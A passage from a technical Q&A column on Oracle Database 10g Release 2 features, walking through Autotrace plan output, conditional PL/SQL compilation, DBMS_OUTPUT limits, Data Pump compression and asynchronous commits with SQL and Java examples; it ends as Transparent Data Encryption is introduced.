2019-01-18 This is some apps from Bitfield that I share my office space with. Jörgen has some helpful tools and utilities I can highly recommend. I use them for sharing moving screenshots with fellow programmers and customers. Crop and generate an optimized palette for making smaller gifs are great. GIF’ted - Turn your movies into animated GIF’s A video player that is unlike VLC easy to use. Since it’s based on FFMPEG, it opens almost everything. Playr - Video playback simplified Why is not Americans using week numbers? It’s so convenient to refer to a week number instead of a range of dates. Friends and families always like to get a little congrats on their big day! They are much appreciated with a simple reminder. For PHP projects PHPStorm is the king of the hill. Everything is built in with being big bloat. PhpStorm: The Lightning-Smart IDE for PHP Programming by JetBrains Great kit that works as an alternative to Adobe Photoshop and Illustrator. You can understand how to do macros! No monthly subscriptions and works great for my needs. Affinity - Professional creative software My favorite todo-app. Read my review of todo apps Things. Your to-do list for Mac & iOS 2017-10-15 Version 2 of F-Bar is here. Make sure to check for updates. This is a free upgrade for every existing customer. Finally, support for Hyper! Hyper lacks support for AppleScript, but it's possible to launch via accessibility controls. Answer yes, and let F-Bar take control. The next time it will launch Hyper! Add a cURL request last in your deployment script and get a push notification when everything is done. Read more here. Added keyboard shortcuts for a faster workflow: If you are running Spaces (multiple virtual desktops) it’s sometimes easy to loose where your dialog is hiding. With the dock icon enabled you can use TAB to select it again The project is completely updated to Swift 4. Removal of Forge Accounts works 2017-07-24 ) ) 2 FROM information_schema.TABLES WHERE 3 `TABLE_NAME` LIKE '%postmeta';. :-) WordPress easy security list WordPress Security – 19+ Steps to Lock Down Your Site 2017-07-21 Next up we are going to add some views. Unfortunately, Xcode does not render Leaf-templates correctly. You could manually set the type to HTML, but this will revert every time you build. Instead, I went back to good old Sublime for editing templates. First install Leaf - Packages - Package Control Open Resources/Views/base.leaf and add Bootstrap 4 in the header. We cannot hurt our eyes with unsettled content :-) "> As you can see Leaf works very similar to Laravel and Blade. Create Resources/Views/index.leaf and add a simple index-page #extend("base") #export("title") { Stations } #export("content") { <table class="table"> <tr> <th>ID</th> <th>Name</th> <th>Country</th> <th>Stream</th> </tr> #loop(stations, "station") { <tr> <td><a href="/station/#(station.id)">#(station.id)</a></td> <td>#(station.name)</td> <td>#(station.country)</td> <td>#(station.stream)</td> </tr> } </table> <a href="/create" class="btn btn-default">Add a station</a> } Instead of section, Leaf is using export as markup. Create Resources/Views/edit.leaf for creating records #extend("base") #export("title") { Stations } #export("content") { <form class="form" action="/station/#(station.id)" method="post"> <div class="form-group"> <label for="name">Name</label> <input class="form-control" type="text" name="name" value="#(station.name)"> </div> <div class="form-group"> <label for="description">Description</label> <textarea class="form-control" name="description" id="description" cols="30" rows="10">#(station.description)</textarea> </div> <div class="form-group"> <label for="country">Country</label> <input class="form-control" type="text" name="country" value="#(station.country)"> </div> <div class="form-group"> <label for="stream">Stream URL</label> <input class="form-control" type="text" name="stream" value="#(station.stream)"> </div> <button type="submit" class="btn btn-primary">Save</button> <a href="/" class="btn btn-default">Back</a> </form> } Like Laravel, you can create controllers and RESTful resources. But for this tutorial, we will just use the Routes.swift and doing all operations directly. First make an index view, should not be any surprises if you are used to Laravel. builder.get { req in // Get all stations let stations = try Station.makeQuery().all() return try self.view.make("index", [ "stations": stations ]) } builder.get("station", ":id") { req in // Make sure the request contains an id guard let stationId = req.parameters["id"]?.int else { throw Abort.badRequest } let station = try Station.makeQuery().find(stationId) return try self.view.make("edit", [ "station": station ]) } builder.get("station", "create") { req in return try self.view.make("edit") } builder.post("station") { req in guard let form = req.formURLEncoded else { throw Abort.badRequest } let station = try Station(node: form) try station.save() return Response(redirect: "/") } Finally, we are adding a route for updating an existing record. As mentioned earlier, Swift is strict and just refresh the model would require a lot of checks. By going via Vapor’s Node package and create a new model and assigning it back to the original record was the easiest way I found. If you have better solutions, feel free letting me know. builder.post("station", ":id") { req in // Make sure it's a form posted guard let form = req.formURLEncoded else { throw Abort.badRequest } // Make sure the request contains an id guard let stationId = req.parameters["id"]?.int else { throw Abort.badRequest } guard let station = try Station.makeQuery().find(stationId) else { throw Abort.notFound } // Use Vapor's node functions to create a new entity let newStation = try Station(node: form) // Assign the new values back to the old station.country = newStation.country station.name = newStation.name station.description = newStation.description // ...and save try station.save() return Response(redirect: "/") } A very nice feature using Xcode is that you get all the debugging features that you would expect from an IDE. Try putting a breakpoint on the route for getting a station, and you can inspect the results. Overall Vapor was a delightful surprise that it feels very Laravel-ish, I am sure the developers of Vapor have looked a lot a Laravel. For me using the same language for the backend and your apps will be a deal maker for many developers, especially if you are using Vapor as a RESTful backend. Vapor feels super snappy, and the performance is incredible, and the memory footprint is very low. Swift in its nature of being strictly type hinted makes some operations like models to have a lot of boiler plate. This could be resolved by a code generator like GitHub - krzysztofzablocki/Sourcery: Meta-programming for Swift, stop writing boilerplate code. Unfortunately, there is no such tool creating Vapor models here yet. All of your edits also demands that everything is re-compiled. Apple has made tremendous efforts to make this more speedy. Obviously, it’s not so easy as save your changes and hit reload in the browser. Will I change? If I am about to build a JSON backend for an iOS-app, I will most likely look into Vapor. In some parts, I could even reuse the same code between the iOS-app and the backend. For me building a SAAS with a lot of party at the front end I would for sure stay with Laravel and maybe use Laravel Spark, because of the more mature tooling like components, seedings, Mix, Vue.js and so forth. 2017-07-19 In this short example, we are going to build a simple CRUD-app of radio-stations that are used in my tvOS-app Radio Player. If you have never programmed in Swift, there are some thing you need to know. Apple has designed Swift to be a static type-safe language with static dispatch. There cannot be any loose ends at compile time; everything must add up. Why is this? Apple’s motifs for this is performance, low memory usage, and stability; bugs should be caught at compilation and not in runtime. By defaulting to making structs and immutable variables is one way for example. Swift 3 has all the bells and whistles you would expect from modern languages with influences from Rust, Haskell, Ruby, Python, C#. With Swift 2.0 Apple also introduced Protocol-Oriented Programming ) in replacement of Object Oriented programming. There are a lot of resources that can explain this better than I can. The nature of the web is very stringy and combine this with Swift’s strict typing, and you have a bit of a problem. Vapor tries to resolve this with a package called Node to help and overcome this issue. Swift also misses multi line strings, which is planned to Swift 4. There are some quirks that you are not used to when doing PHP. Some operation demands a lot more of boiler plate code than you are maybe used to. Swift features a very limited runtime and has no meta-programming features, which leads our projects to contain more boilerplate code. One solution to this could be the tool like Sourcery. Unfortunately there is no such tool yet. I think this is only beginning. Create a file in Model/Station.swift and create a class that extends Model like this import Vapor import MySQLProvider final class Station: Model { // The storage property is there to allow Fluent to store extra information on your model--things like the model's database id. let storage = Storage() var id: Node? var name: String var description: String var country: String var stream: String // Just static variables holding the names to prevent typos static let nameKey = "name" static let descriptionKey = "description" static let countryKey = "country" static let streamKey = "stream" init(name: String, description: String, country: String, stream: String) { self.id = nil self.name = name self.description = description self.country = country self.stream = stream } // The Row struct represents a database row. Your models should be able to parse from and serialize to database rows. Here's the code for parsing the Stations from the database. init(row: Row) throws { id = try row.get(Station.idKey) name = try row.get(Station.nameKey) description = try row.get(Station.descriptionKey) country = try row.get(Station.countryKey) stream = try row.get(Station.streamKey) } // Init model from a Node-structure init(node: Node) throws { name = try node.get(Station.nameKey) description = try node.get(Station.descriptionKey) country = try node.get(Station.countryKey) stream = try node.get(Station.streamKey) } func makeRow() throws -> Row { var row = Row() try row.set(Station.nameKey, name) try row.set(Station.descriptionKey, description) try row.set(Station.countryKey, country) try row.set(Station.streamKey, stream) return row } } We need to show Vapor how to save it back into the database. We add a method called makeNode() with instructions. Just to make it more clear we create an extension that conforms to the NodePrespesentable protocol. Extensions can add new functionality to an existing class, structure, enumeration, or protocol type. Interfaces vs Inheritance in Swift extension Station: NodeRepresentable { func makeNode(in context: Context?) throws -> Node { var node = Node(context) try node.set(Station.idKey, id?.int) try node.set(Station.nameKey, name) try node.set(Station.descriptionKey, description) try node.set(Station.countryKey, country) try node.set(Station.streamKey, stream) return node } } The cool thing is that protocols can be adopted by classes, structs, and enums. Base classes and inheritance are restricted to class types. You can decorate with default behaviors from multiple protocols. Unlike multiple inheritances of classes which some programming languages support, protocol extensions do not introduce any additional state. Finally, we have to make a migration, called preparation in Vapor for the model. extension Station: Preparation { static func prepare(_ database: Database) throws { try database.create(self) { builder in builder.id() builder.string(Station.nameKey) builder.string(Station.descriptionKey) builder.string(Station.countryKey) builder.string(Station.streamKey) } } static func revert(_ database: Database) throws { try database.delete(self) } } Next, we are going to add MySQL and Leaf-providers to the droplet, as you would do in Laravel Source/App/Config+Setup.swift import LeafProvider import MySQLProvider extension Config { public func setup() throws { // allow fuzzy conversions for these types // (add your own types here) Node.fuzzy = [JSON.self, Node.self] try setupProviders() } /// Configure providers private func setupProviders() throws { try addProvider(LeafProvider.Provider.self) try addProvider(MySQLProvider.Provider.self) // Run migrations aka preparations preparations.append(Station.self) } } Open Sources/App/Routes.swift and add a route. builder.get { req in return try Station.makeQuery().all().makeJSON() } Press the Run-button in Xcode 2019-01-18 2017-10-15 2017-07-24 2017-07-21 2017-07-19 2017-07-18 2017-05-03 2017-04-12 2017-04-06 2017-04-03 2017-03-21 2017-03-20 2017-02-23 2017-01-12 2016-11-15 2016-11-10 2016-11-07 2016-11-06 2016-11-03 2016-11-01 2016-10-24 2016-10-24 2016-10-13 2016-10-06 2016-10-04 2016-09-23 2016-09-06 2016-08-17 2016-08-09 2016-07-29 2016-07-20
https://eastwest.se/blog
CC-MAIN-2020-24
refinedweb
2,177
60.01
3 Jan 18:49 2013 Re: error message relating to png file when running maQualityPlots Dan Tenenbaum <dtenenba@...> 2013-01-03 17:49:44 GMT 2013-01-03 17:49:44 GMT On Thu, Jan 3, 2013 at 8:37 AM, James W. MacDonald <jmacdon@...> wrote: > I don't remember if Macs come ready to do png graphics or not, and a quick > google doesn't clear it up for me. In general, png is supported on the mac. > So the first step I would take is to > ensure that you have the capability to do so. Try typing > > capabilities() > > at an R prompt and see if there is a TRUE under png. If not, you can set the > dev argument of maQualityPlots() to a device for which you have > capabilities. If there is a TRUE under png, then you will need to furnish > the actual code you are running (or better yet, a reproducible example, > which implies that I or anybody else can try and replicate what you have > done). > Yes, a reproducible example would be great. I am guessing that you are working your way through this code: This uses packages which are obsolete so it's not surprising that you are getting errors. Dan > Best, > > Jim > > > On 1/3/2013 11:15 AM, Yanqing Hu [guest] wrote: >> >> I'm using Rstudio on my Mac. When I ran the code maQualityPlots(beta7) in >> Chapter 4 of Bioinformatics and Computational Biology Solutions Using R and >> Bioconductor, I got the mesasge "Error in plot.new() : could not open file >> 'diagPlot.6Hs.195.1.png'". Does anyone know how to fix this problem? Thanks >> a lot! >> >> -- output of >> [7] base >> >> other attached packages: >> [1] vsn_3.26.0 arrayQuality_1.36.0 beta7_1.0.4 >> [4] marray_1.36.0 cluster_1.14.2 BiocInstaller_1.8.2 >> [7] affycomp_1.34.0 affyPLM_1.34.0 preprocessCore_1.20.0 >> [10] gcrma_2.30.0 hgu133acdf_2.11.0 hgu95av2cdf_2.11.0 >> [13] AnnotationDbi_1.20.0 affydata_1.11.17 affy_1.36.0 >> [16] Biobase_2.18.0 BiocGenerics_0.4.0 class_7.3-5 >> [19] limma_3.14.3 >> >> loaded via a namespace (and not attached): >> [1] affyio_1.26.0 Biostrings_2.26.1 DBI_0.2-5 >> [4] grid_2.15.1 gridBase_0.4-5 hexbin_1.26.0 >> [7] IRanges_1.16.2 lattice_0.20-10 parallel_2.15.1 >> [10] RColorBrewer_1.0-5 RSQLite_0.11.2 splines_2.15.1 >> [13] stats4_2.15.1 tools_2.15.1 zlibbioc_1.4.0 >> >> -- >> Sent via the guest posting facility at bioconductor.org. >> >> _______________________________________________ >>: > _______________________________________________ Bioconductor mailing list Bioconductor@... Search the archives:
http://permalink.gmane.org/gmane.science.biology.informatics.conductor/45464
CC-MAIN-2014-15
refinedweb
421
68.77
JavaScript common mistakes and tools If you are writing Java Script code, it is worth using code quality tools like JSLint and JSHint to avoid any pitfalls likeIf you are writing Java Script code, it is worth using code quality tools like JSLint and JSHint to avoid any pitfalls like - using global variables - leaving trailing commas in object declarations - not understanding the difference between closures and functions - forgetting to declare a var - naming a variable with the same name as an HTML id, etc. It is also essential to use JavaScript testing frameworks like Jasmine, Selenium + WebDriver, QUnit, and TestSwarm. QUnit is an easy-to-use, JavaScript test suite that was developed by the jQuery project to test its code and plugins, but is capable of testing any generic JavaScript code. One of the challenges of JavaScript rich application is testing it for cross browser compatibility. The primary goal of TestSwarm is to simplify the complicated, and time-consuming process of running JavaScript test suites in multiple browsers. It provides all the tools necessary for creating a continuous integration work-flow for your JavaScript rich application. Debugging JavaScripts can be a painful part of web development. There are handy browser plugins, built-ins and external tools to make your life easier. Here are a few such tools. - Cross-browser (Firebug Lite, JS Shell, Fiddler, Blackbird Javascript Debug helper, NitobiBug, DOM Inspector (aka DOMi), Wireshark / Ethereal) - Firefox (JavaScript Console, Firebug, Venkman, DOM Inspector, Web Developer Extension, Tamper Data, Fasterfox, etc) - Internet Explorer (JavaScript Console, Microsoft Windows Script Debugger, Microsoft Script Editor, Visual Web Developer, Developer Toolbar, JScript Profiler, JavaScript Memory Leak Detector) - Opera (JavaScript Console, Developer Console, DOM Snapshot, etc) - Safari ("Debug" menu, JavaScript Console, Drosera - Webkit, etc) - Google Chrome (JavaScript Console and Developer Tools) Here is an example of global window scope and a neatly packaged "name" variable and "greet" function into an object literal. You can also note that the value of 'this' is changed to the containing object, which is no longer the global "window" object. This is quite useful as you can keep a set of variables and functions abstracted into one namespace without any potential conflicts of names. <html> <head> <meta http- <title>Insert title here</title> <script type="text/javascript"> //bad - global variable and function window. </body> </html> Note: It is a best practice to define your HTML and Javascript in separate files. The above code snippet is for illustration purpose only. The output will be hello window-global-scope howdy object-scope - == operator compare the values but it doesn’t compare the data type of operands. - === operator in JavaScript compare not only the value of operands, but also the data type. If the data type of operands is different, it will always return false. 5. Not understanding what the implicit scope "this" refers to. For example, function Account(balance) { this.balance = balance; this.getTenPercentOfbalance = function() { return balance * 0.10; }; } var mortgageAccount = new Account(10000.00); mortgageAccount.getTenPercentOfbalance(); // returns 1000.00 Now, if you try var tenPercentMethod = mortgageAccount.getTenPercentOfbalance(); tenPercentMethod(); // throws an error Why did it throw an error? The implicit "this" points to the global Window object, and the Window object does not have the function getTenPercentOfbalance( ). The above two lines can be written with the JavaScript head object 'window' as shown below. var window.tenPercentMethod = window.mortgageAccount.getTenPercentOfbalance(); window.tenPercentMethod(); // throws an error Important: The value of this, passed to all functions, is based on the context in which the function is called at runtime. You can fix this by tenPercentMethod.apply(mortgageAccount); // now it uses this == mortgageAccount When invoking constructors with the 'new' keyword, 'this' refers to the “object that is to be” when the constructor function is invoked using the new keyword. Had we not used the new keyword above, the value of this would be the context in which Account is invoked — in this case the 'window' head object. var mortgageAccount = Account(10000.00); // without new key word. this is passed to the constructor as 'window'. console.log(mortgageAccount.balance); // undefined, the value is actually set at window.balance 'this'. The good news is that this will be fixed in ECMAScript 5. Here is another example on this reference and scope: In JavaScript, scope is resolved during execution of functions. If you have nested functions, once you have executed a function nested within a function, JavaScript has lost your scope and is defaulting to the best thing it can get, window (i.e. global). To get your scope back, JavaScript offers you two useful functions, call and apply. <html> <head> <meta http- <title>Insert title here</title> <script type="text/javascript"> object = { name: "object-scope", greet: function() { nestedGreet = function(greeting) { console.log(greeting + " " + this.name); } //scope is resolved during execution of functions nestedGreet('hello'); //hello window-global-scope //loses its scope and defaults to window nestedGreet.call(this, 'hello'); //hello object-scope nestedGreet.apply(this, ['hello']); //hello object-scope } } </script> </head> <body onload="object.greet()"> </body> </html> 6. Not understanding getting the function back versus invoking the function, especially when used in callback functions. The callback functions are not invoked directly. They are iether invoked asynchronously after a certain event like button click or after a certain timeout. function sayHello(){ return "Hello caller"; } Now, if you do the following, you only get the function back. var varFunction = sayHello; // stores the function to the variable varFunction setTimeout(sayHello, 1000) // can also pass it to other functions. // This is a callback function // Will call sayHello a second later. window.load = sayHello; // Can attach to objects. Will call sayHello when the page loads // This is a callback function But if you add '( )' to it as shown below, you will be actually invoking the function. sayHello(); //invoke the function varFunction(); //invoke the function So, the addition of paranthese to the right invokes the function. So, incorrectly assigning like shown below will callback the function immediately. Wrong: setTimeout(sayHello(), 1000); // won't wait for a second <input id="mybutton" onclick="sayHello();return false;" type="button" value="clickMe" /> //invokes it straight a way without waiting for onclick event. Correct: setTimeout(sayHello, 1000); // waits for a second //jQuery to the rescue $('#mybutton').click(function(){ return "Hello caller"; })So, it is a best practice to favor using proven JavaScript frameworks to avoid potential pitfalls. 7. Not understanding JavaScript scopes. Javascript only has global and function scopes, and does not have block scopes as in other languages like Java. In JavaScript, functions are values that can be assigned to a variable, including arrays. In the example below, the above correct code fragment uses a powerful feature of Javascript known as first order functions. In every iteration the variable item is declared that contains the current element from the array. The function that is generated on the fly contains a reference to "item" and will therefore be part of its closure. Logically, this means that in the first function captures the value {'id': 'fname', 'help': 'Entr your first name'}, and the second function captures the value {'id': 'lname', 'help': 'Enter your surname'}, and so on. The incorrect function is also showed to understand the difference. <html> <head> <meta http- <title>Insert title here</title> <script type="text/javascript"> function showHelp(help) { document.getElementById('help').innerHTML = help; } function initializeHelpWrongly() { var helpText = [ {'id': 'fname', 'help': 'Entr your first name'}, {'id': 'lname', 'help': 'Enter your surname'} ]; for (var i = 0; i < helpText.length; i++) { var item = helpText[i]; //Wrong: by the time this function is executed the for loop would have been completed //and the value of the item would be the last item in the array, which is id: lname document.getElementById(item.id).onfocus = function() { console.log(item.help); showHelp(item.help) } } } function initializeHelpCorrectly() { var helpText = [ {'id': 'fname', 'help': 'Entr your first name'}, {'id': 'lname', 'help': 'Enter your surname'} ]; for (var i = 0; i < helpText.length; i++) { var item = helpText[i]; //In every iteration a new function is created on the fly, which contains //a reference to current item being processed in the loop //and will therefore be part of its closure. Logically, this means that in the //first function captures id: fname, and second function captures id:lname so on. document.getElementById(item.id).onfocus = function(item) { return function() { console.log(item.help); showHelp(item.help) }; }(item); } } </script> </head> <!-- try substituting initializeHelpWrongly()--> <body onload="initializeHelpCorrectly();"> <p id="help">Help text appear here</p> <p>fname: <input type="text" id="fname" name="fname"></p> <p>lname: <input type="text" id="lname" name="lname"></p> </body> </html> 8. Not testing the JavaScript code for cross browser compatibility. 9. Trying to reinvent the wheel by writing substandard functions as opposed to reusing functions from proven frameworks and libraries. for (var i = 0, len = items.length; i < len; i++){ setTimeout(function(){ processItem(items[i]) }, 5) } Note: The above code can be further improved with a queue, dynamic batch sizes, and eliminating the need for a for loop. Labels: JavaScript
http://java-success.blogspot.com.au/2012/07/
CC-MAIN-2018-09
refinedweb
1,485
54.12
When you get started with functional programming (FP) a common question you’ll have is, “What is an effect in functional programming?” You’ll hear advanced FPers use the words effects and effectful, but it can be hard to find a definition of what these terms mean. Effects are related to monads A first step in the process of understanding effects is to say that they’re related to monads, so you have to know a wee bit about monads to understand effects. As I wrote in my book, Functional Programming, Simplified, a slight simplification is to say that in Scala, a monad is any class that implements the map and flatMap methods. Because of the way Scala for-expressions work, implementing those two methods lets instances of that class be chained together in for-expressions (for/yield expressions). (If you thought understanding monads was hard, I hope that helps to make them easier to understand.) The benefit of monads That leads to the benefit of monads in Scala: they let you sequence a series of operations together. For example, if every function returns an Option, you can sequence the functions together in a for-expression: def fInt(): Some[Int] = Some(1) def fDouble(): Some[Double] = Some(1.0) def fString(): Some[String] = Some("alvin") val x = for { a <- fInt() b <- fDouble() c <- fString() } yield (a,b,c) // x: Option[(Int, Double, String)] = Some((1,1.0,alvin)) Indeed, when people use the term monadic in Scala you can typically replace the word “monadic” with “in a for-expression.” Summary: Step 1 is knowing that a monad in Scala is simply a class that implements mapand flatMapso it can be used in a for-expression. (That’s a slight over-simplification, but it’s good enough for now.) Not a side effect, but the main effect Now that we know that we’re talking about monads, the next important part is to understand the meaning of the word “effect.” A good way to describe this is to say that we’re not talking about a side effect — instead we’re talking about a main effect, i.e, the main purpose of each individual monad. An effect is what the monad handles. This first became clear when I read the book, Functional and Reactive Domain Modeling, and came across these statements: Optionmodels the effect of optionality Futuremodels latency as an effect Tryabstracts the effect of failures (manages exceptions as effects) Those statements can also be written like this: Optionis a monad that models the effect of optionality (of something being optional) Futureis a monad that models latency as an effect Tryis a monad that models the effect of failures (manages exceptions as effects) Similarly: Readeris a monad that models the effect of composing operations that depend on some input Writeris a monad that models logging as an effect Stateis a monad that models the effect of state (composing a series of computations that maintain state) So again, an effect is the thing a monad handles. In terms of code, it’s how a monad implements its flatMap method to achieve that effect. Note: In Haskell, the equivalent of the flatMapmethod is known as bind. Effectful functions return F[A] rather than [A] In a YouTube video titled, Functional Programming with Effects, Rob Norris makes an interesting point: he says that an effectful function is a function that returns F[A] rather than [A]. For example, this function returns Option[Int] rather than Int: def toInt(s: String): Option[Int] = { try { Some(Integer.parseInt(s.trim)) } catch { case e: Exception => None } } In creating toInt you could write a function that returns Int, but the only ways to do that are: - Return 0if the conversion fails, or - Return nullif the conversion fails Regarding the first case, this is a bad idea because users will never know if the function received "0" or something like "fred" that won’t convert to a number. Regarding the second case, using null is a bad practice in both OOP and FP, so that approach is just a bad idea. Therefore, it occurs to you that a logical thing to do is to return an Option from toInt. Option lets you handle the optional possible return values from toInt: Some[Int]if toIntsucceeds Noneif the toIntconversion fails This is what it means when we say, “ Option is a monad that models the effect of optionality,” and it’s also what Mr. Norris means when he says that an effectful function returns F[A] rather than [A]. In the toInt example: F[A]is Option[Int] Ais the raw Inttype Now, because toInt is effectful — meaning that it returns an F[A], which is a monadic type — it can be used in for-expressions like this: val x = for { a <- toInt(string1) b <- toInt(string2) c <- toInt(string3) } yield (a + b + c) The result of this expression is that x will be a Some[Int] or a None. For some reason my brain has a hard time absorbing the words effect and effectful when people talk about things abstractly, so I decided to dig into this topic and then share my notes here. I hope you find them helpful as well. As mentioned, rather than thinking of a side effect, an effect is the main effect of a monad that you’re using: Optionis a monad that models the effect of optionality Futureis a monad that models latency as an effect Tryis a monad that models the effect of failures (manages exceptions as effects) Readeris a monad that models the effect of composing operations that depend on some input Writeris a monad that models logging as an effect Stateis a monad that models the effect of state (composing a series of computations that maintain state) Furthermore, when a function is said to be effectful, it simply means that the function is returning a monad, i.e., some type F[A] rather than the raw type A. Notes In my programming life I need to move on to other topics, so I wrote this post quickly. It would be more effective if I showed you how to write flatMap and map functions in a monad, but I already did that in Functional Programming, Simplified, so I won’t repeat that here. A few other notes: - I oversimplified the definition of monad in that discussion. There are formal rules about monads that are important, and I discuss those in Functional Programming, Simplified. But a useful simplification is that any class that implements mapis a functor, and any class that further implements flatMap(in addition to map) is a monad. - In the preceding discussion I used Optionfor my examples, but you can also use instances of Tryor Either, if you prefer. - I could have written toIntshorter (as shown below) but I wanted to clearly show the Option/Some/None types in the function body: def toInt(s: String): Option[Int] = Try(Integer.parseInt(s.trim)).toOption
https://alvinalexander.com/scala/what-effects-effectful-mean-in-functional-programming/
CC-MAIN-2021-10
refinedweb
1,164
50.7
My First Day with the New Release By Tom Kyte Our technologist talks about his first experience with Oracle Database 10g Release 2. Can you tell us about your experience with Oracle Database 10g Release 2 and point out some of the important new features? First, this column will not even attempt to cover everything new under the sun with Oracle Database 10g Release 2that would be an impossible task in just a few pages. For the entire story, see the Oracle Database 10g Release 2 New Features Guide (see Next Steps). Rather, what you'll see here are some of the things I noticed and felt deserved pointing out. Autotrace In my first couple of minutes using Oracle Database 10g Release 2, I immediately found this improvementshown in Listing 1to Autotrace. Autotrace is now using the DBMS_XPLAN package to display the explain plans. This gives us a much more detailed explain plan than in previous releases. We could have gotten this plan in Oracle9i Database Release 2 and above using the supplied DBMS_XPLAN package, but having Autotrace use DBMS_XPLAN for us just makes it so much easier. Of particular note in the DBMS_XPLAN output is the addition of the predicates to the bottom of the plan, showing at exactly which step Oracle Database is applying them. This is great. Code Listing 1: Autotrace with DBMS_XPLAN SQL> set autotrace traceonly explain SQL> select * 2 from emp, dept 3 where emp.deptno = dept.deptno 4 and emp.job = 'CLERK'; Execution Plan -------------------------------------------------------------------------------------- Plan hash value: 877088642 ------------------------------------------------------------------------------------------------------------ | Id | Operation | Name | Rows | Bytes | Cost (%CPU) | Time | ------------------------------------------------------------------------------------------------------------ | 0 | SELECT STATEMENT | | 4 | 468 | 7 (15) | 00:00:01 | |* 1 | HASH JOIN | | 4 | 468 | 7 (15) | 00:00:01 | |* 2 | TABLE ACCESS FULL | EMP | 4 | 348 | 3 (0) | 00:00:01 | | 3 | TABLE ACCESS FULL | DEPT | 4 | 120 | 3 (0) | 00:00:01 | ------------------------------------------------------------------------------------------------------------ Predicate Information (identified by operation id): ----------------------------------------------------------------------------------------- 1 - access("EMP"."DEPTNO"="DEPT"."DEPTNO") 2 - filter("EMP"."JOB"='CLERK') Note -------- - dynamic sampling used for this statement Conditional Compilation PL/SQL has lots of new stuff. The first thing I noticed was conditional compilation, something I missed from my days as a C programmer. Conditional compilation is the ability to make the compiler effectively ignore code (or not) at will. It may not sound too useful at first, but it is. With conditional compilation, Listing 2 shows a quick view of what conditional compilation implies and how it works. Code Listing 2: Conditional PL/SQL compilation example SQL> create or replace procedure p 2 as 3 begin 4 $IF $$debug_code $THEN 5 dbms_output.put_line( 'Our debug code' ); 6 dbms_output.put_line( 'Would go here' ); 7 $END 8 dbms_output.put_line( 'And our real code here' ); 9 end; 10 / Procedure created. Notice how the "debug" code is not printed and the code compiles without the $$debug_code value being defined. SQL> exec p And our real code here PL/SQL procedure successfully completed. By simply enabling the debug_code variable, we can enable that debug code. Note that "debug_code" is my nameit is not a special name; you can define your own variables at will. SQL> alter procedure P compile 2 plsql_ccflags = 'debug_code:true' reuse settings; Procedure altered. SQL> exec p Our debug code Would go here And our real code here PL/SQL procedure successfully completed. DBMS_OUTPUT DBMS_OUTPUT has been upgraded in Oracle Database 10g Release 2. Not only can you specify a buffer size of unlimited (no more 1,000,000-byte limit!), but you can also print lines much larger than 255 characters. The line length limit is now 32K. The following demonstrates the DBMS_OUTPUT upgrade: SQL> set serveroutput on - > size unlimited SQL> begin 2 dbms_output.put_line 3 ( rpad('*',2000,'*') ); 4 end; 5 / ************************ ... ************************ PL/SQL procedure successfully completed. Oracle Fast-Start Failover Another new capability in Oracle Database 10g Release 2 is automatic failover to a standby database. Instead of a human being running a sequence of commands or pushing a button, Oracle Data Guard can now automatically fail over to the standby database upon failure of the production site, storage, or network. Database Transports Oracle Database 10g Release 1 introduced the cross-platform transportable tablespace, but Oracle Database 10g Release 2 takes it to the next level. Now you can transport an entire database across platforms that share the same endianess (byte ordering). That means you can move an entire database (not just transport individual tablespaces) from Apple Macintosh to HP-UX or from Solaris x86 to Open VMS. No more dump and reload. Data Pump Compression When Oracle Database 10g Release 1 came out, the good news was that the export (EXP) and import (IMP) utilities had been totally rewritten, and the new Oracle Data Pump utilities EXPDP and IMPDP were introduced. One downside of the EXPDP and IMPDP tools was that compressing the DMP files during the export process was impossible. With EXPDP, you had to create the DMP file and then compress it, unlike the process with the older EXP tool, which you could tell to write to a named pipe and the data written to the named pipe could be compressedall in one step. Fortunately, Oracle Database 10g Release 2 makes it easier to create and partially compress DMP files than the old tools ever did. EXPDP itself will now compress all metadata written to the dump file and IMPDP will decompress it automaticallyno more messing around at the operating system level. And Oracle Database 10g Release 2 gives Oracle Database on Windows the ability to partially compress DMP files on the fly for the first time (named pipes are a feature of UNIX/Linux). Asynchronous Commit Normally when a Java, C, or Visual Basic application issues a COMMIT, that causes a waitspecifically, a log file sync wait. This wait is due to the client waiting for the log writer process to flush the redo to diskto make the transaction permanent. Normally this is exactly what you want to have happen. When you COMMIT, it should be permanent. However, there are exceptions to all rules. What about a system that is processing incoming records as fast as possible, perhaps from a sensor or a network feed? This program's goal in life is to batch up a couple records, INSERT them, COMMIT them (to make them visible), and continue on. It doesn't really care to wait for the COMMIT to complete; in fact, by waiting, this program is not running as fast as it can. Enter the asynchronous COMMIT in Oracle Database 10g Release 2. We can now say "commit, but don't wait" or "commit, and please do wait." If you use the commit-but-don't-wait mode, however, you must be prepared at some point in the future to have data that was "committed" be lost. If you commit but don't wait and the system fails, that data may not have been committed. Only you can decide whether this is acceptable to you. But there are many classes of applicationsincluding high-speed data ingest programs whose only goal is to get the stream of data into the databasewhere commit-but-don't-wait is not only acceptable but very desirable performancewise. As a small example, I wrote the Java routine in Listing 3. Code Listing 3: Commit but don't waitasynchronous commit import java.sql.*; public class instest { static public void main(String args[]) throws Exception { DriverManager.registerDriver(new oracle.jdbc.driver.OracleDriver()); Connection conn = DriverManager.getConnection ("jdbc:oracle:thin:@desktop:1521:ora10gr2", "scott","tiger"); conn.setAutoCommit( false ) Statement sql_trace = conn.createStatement(); sql_trace.execute ( "truncate table t" ); System.out.println( "Table truncated" ); sql_trace.execute ( "begin " + " dbms_monitor.session_trace_enable( WAITS=>TRUE );" + "end;" ); // create table t(x char(2000)) // create index t_idx on t(x) PreparedStatement pstmt = conn.prepareStatement ("insert into t(x) values(?)" ); pstmt.setString( 1, "x" ); PreparedStatement commit = conn.prepareStatement ("commit work write batch nowait"); // ("commit work write immediate wait"); for( int i = 0; i < 1000; i++ ) { pstmt.executeUpdate(); commit.executeUpdate(); } conn.close(); } } Note how the COMMIT statement I'm using in Listing 3 is either COMMIT WORK WRITE BATCH NOWAIT or COMMIT WORK WRITE IMMEDIATE WAIT. The former is the new featureit shows how to COMMIT without waiting for the COMMIT to be finalized. The latter is the way it has historically happened. When I ran the test program in Listing 3 (the CREATE TABLE is a comment before the INSERT statement for reference), I observed a lot of time spent waiting for log file sync waits when using the WAIT option and virtually no time spent waiting with the NOWAIT option. The results are shown in Listing 4. Code Listing 4: Comparing WAIT and NOWAIT results Event Waited On Times Waited Max. Wait Total Waited ---------------- ---------------- -------------------- -------------------- log file sync (nowait) 19 0.02 0.04 log file sync (wait) 1017 0.04 1.43 This will make a measurable difference in high-speed data load programs that need to COMMIT periodically during the load. Transparent Data Encryption Now for a revolutionary feature in Oracle Database 10g Release 2Transparent Data Encryption. This is the ability to easily andas the name impliestransparently encrypt stored information. 